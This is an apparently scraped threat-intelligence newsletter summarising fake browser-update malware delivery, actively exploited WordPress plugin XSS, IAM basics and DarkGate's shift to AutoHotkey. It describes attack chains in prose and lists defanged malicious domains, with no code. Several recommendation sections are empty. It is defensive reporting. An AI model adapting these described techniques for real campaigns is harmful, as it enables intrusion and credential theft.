Tecplix ThreatTrack Insights - June I
1. Fake Browser Updates Spreading Remote Access Trojans and Information Stealers
A new wave of cyber threats involves fake web browser updates used to deliver remote access trojans (RATs) and information-stealing malware like BitRAT and Lumma Stealer. These deceptive updates have been linked to numerous infections, including those from the notorious SocGholish malware.
The attack chain commences when prospective targets visit a booby-trapped website that contains JavaScript code designed to redirect users to a bogus browser update page ("chatgpt-app[.]cloud"). The redirected web page comes embedded with a download link to a ZIP archive file ("Update.zip") that's hosted on Discord and downloaded automatically to the victim's device.
Present within the ZIP archive file is another JavaScript file ("Update.js"), which triggers the execution of PowerShell scripts responsible for retrieving additional payloads, including BitRAT and Lumma Stealer, from a remote server in the form of PNG image files. Also retrieved in this manner are PowerShell scripts to establish persistence and a .NET-based loader that's primarily used for launching the final-stage malware
Key Takeaways:
Impact:
Who is Affected?
Organizations and individuals who inadvertently visit compromised websites and follow misleading browser update prompts are at risk. This includes users across various sectors who may be targeted through drive-by downloads, malvertising, and phishing tactics that exploit their trust in browser updates.
Recommendations:
2. Active Exploitation of Critical Vulnerabilities in WordPress Plugins
Cybersecurity researchers have identified multiple high-severity vulnerabilities in several WordPress plugins that are currently being exploited by malicious actors. These flaws are primarily unauthenticated stored cross-site scripting (XSS) vulnerabilities, which allow attackers to inject malicious scripts due to inadequate input sanitization and output escaping.
Key Takeaways:
Vulnerabilities are present in the following plugins:
Impact:
Attack chains exploiting these vulnerabilities involve injecting payloads pointing to obfuscated JavaScript files hosted on external domains. These scripts facilitate the creation of rogue administrator accounts, insertion of backdoors, and deployment of tracking scripts. The backdoors, written in PHP, are inserted into the plugin, and theme files while tracking scripts send HTTP GET requests with HTTP host information to a remote server at "ur.mystiqueapi[.]com/?ur".
Who is Affected?
Website administrators and users running vulnerable versions of the affected plugins are at risk. To mitigate these threats, immediate patching and updates are recommended.
Recommendations:
领英推荐
3. Enhanced Security With IAM: A Comprehensive Guide
According to Verizon, 61% of all security breaches involved credential thefts acquired through social engineering methods or hacked using brute force tactics.
Another study reveals that 44% of security experts believe implementing an Identity and Access Management (IAM) solution can address their current security vulnerabilities.
IAM incorporates management of the entire lifecycle of user identities and access across all enterprise resources, whether in data centers or the cloud. The identity manager regulates access and entitlements through defined roles, policies, and tools, extending privileges to network entities (users and devices) for diverse applications, both on-premises and in the cloud.
IAM’s objective is to grant a single digital identity for each individual or item. Where, users encompass customers, partners, and employees, while devices span computers, smartphones, routers, servers, controllers, and sensors. Once established, the digital identity is maintained, modified, and monitored throughout each user’s or device’s access lifecycle.
Identity Management in Practice
In a broader sense, identity management facilitates access to enterprise assets, aligning with user and device entitlements within specific contexts. This encompasses onboarding users and systems, authorizing permissions, and timely offboarding of users and devices...Read more.
4. AutoHotKey-based DarkGate Malware Campaigns Target the U.S., Europe, and Asia
Cyber-attacks involving the DarkGate malware-as-a-service (MaaS) operation have shifted their delivery mechanism from AutoIt scripts to AutoHotkey, marking a significant evolution in their tactics to evade detection. This transition was observed in version 6 of DarkGate, released in March 2024 by its developer RastaFarEye, who markets the malware to a select group of around 30 subscribers. Active since at least 2018, DarkGate continues to pose a significant threat with its advanced features and constant updates.
Key Takeaways
Impact:
DarkGate’s latest developments highlight the persistent threat it poses to organizations worldwide. The malware’s ability to adapt rapidly by changing its delivery methods and incorporating new features while removing old ones that could lead to detection ensures it remains a formidable tool for cybercriminals. Its extensive capabilities, including command-and-control, rootkit functionalities, credential theft, and remote desktop access, enable attackers to execute a wide range of malicious activities, significantly impacting targeted organizations.
Who is Affected?
DarkGate’s recent campaigns have primarily targeted sectors such as healthcare technology, telecommunications, and fintech across the U.S., Europe, and Asia. Organizations in these industries are at heightened risk and should be particularly vigilant about phishing attacks and the evolving tactics used by threat actors behind DarkGate.
Recommendations:
In Crisis?
If you suspect a compromise or face a critical security issue, connect with us to unlock rapid, expert protection. Your Security and Business Continuity is our top Priority!
Get in touch with our security team by filling out this form or call at +91 6366 600 700.